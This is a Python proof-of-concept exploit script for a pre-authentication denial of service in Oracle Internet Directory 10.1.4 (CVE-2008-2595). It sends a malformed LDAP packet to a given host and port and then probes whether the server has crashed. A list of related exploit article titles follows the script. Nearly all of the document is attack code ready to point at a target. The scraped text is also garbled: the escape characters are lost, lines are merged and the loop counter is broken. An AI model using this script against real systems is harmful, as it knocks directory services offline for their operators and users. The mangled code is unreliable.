#!/usr/bin/python"""

Oracle Internet Directory 10.1.4 preauthentication Denial Of ServiceNOTES: Under 32 bits platforms it crashes immediately. Under 64 bits it may take even hours.

Sometimes you need 2 shoots to crash OID completely. The server "commonly" tolerates one

shoot, but even when you only send one packet it will crash.Tested: Win2000 x86, WinXP x86, Win2003 X86_64Vulnerability found by Joxean Koret (joxeankoret [ at ] yahoo DOT es)Fixed: Oracle Critical Patch Update July 2008

CVEID: CVE-2008-2595

"""import sys

import time

import sockethealthPacket = "0%x02x01x01c x04x00nx01x02nx01x00x02x01x00x02x01x00x01x01x00x87x0bobjectClass0x00"

packet = "x30x0ex02x01x01x60x09x30x01x03x04x02x44x4ex80x00"def checkHealth(hostname, port):

print " --> Wating 5 seconds"

time.sleep

(5)

print " --> Connecting to target..."

socket.setdefaulttimeout

(5)

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

s.connect((hostname, port)) try:

print " --> Sending 'health' packet ..."

s.sendall(healthPacket)

print " --> Trying to receive something..."

data = s.recv(1024)

except:

err = sys.exc_info()[1] if int(err[0]) == 104:

print "[ ] Exploits works!"

return if data != "":

print "[!] Server is up and running :("

else:

print "[?] Server doesn't answer nothing. It works?"def oidDos(hostname, port):

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

try:

print "[ ] Connecting to ldap://%s:%d..." % (hostname, port)

s.connect((hostname, int(port))) print "[ ] Sending packet..."

s.sendall(packet)

s.close() print "[ ] Checking OID's health..."

checkHealth(hostname, port)

except:

print sys.exc_info()[1]def usage():

print "Oracle Internet Directory 10.1.4 Remote Preauthentication DOS"

print "Copyright (c) 2007 Joxean Koret"

print

print "Usage:"

print sys.argv[0],"-h -p"

printdef main():

if len(sys.argv) != 3:

usage()

sys.exit(0)

hostname = None

port = None i = 0

for param in sys.argv:

i = 1

if i == 1:

continue

if param.startswith("-h"):

hostname = param[2:]

elif param.startswith("-p"):

port = int(param[2:])

else:

print "Unknown option '%s'" % param

usage()

sys.exit

(1)

if not hostname or not port:

print "Bad command line."

usage()

sys.exit

(1) oidDos(hostname, port)if __name__ == "__main__":

main()

【Oracle Internet Directory 10.1.4 Remote Preauth DoS Exploit】相关文章：

★ 百度卫士清理注册表后系统出现异常怎么办？

★ BIND 9.x Remote DNS Cache Poisoning Flaw Exploit (c)

★ IntelliTamper 2.07 (map file) Local Arbitrary Code Execution Exploit (pl)

★ BIND 9.x Remote DNS Cache Poisoning Flaw Exploit (py)

★ MojoPersonals (mojoClassified.cgi mojo) Blind SQL Injection Exploit

★ F8如何进入安全模式,安全模式的作用

★ Cisco IOS 12.3(18) FTP Server Remote Exploit (attached to gdb)

★ SQL Hex Injection 十六进制注入解决方案

★ 360网盾如何关闭？

★ 用Dos命令加锁 防止病毒格式化硬盘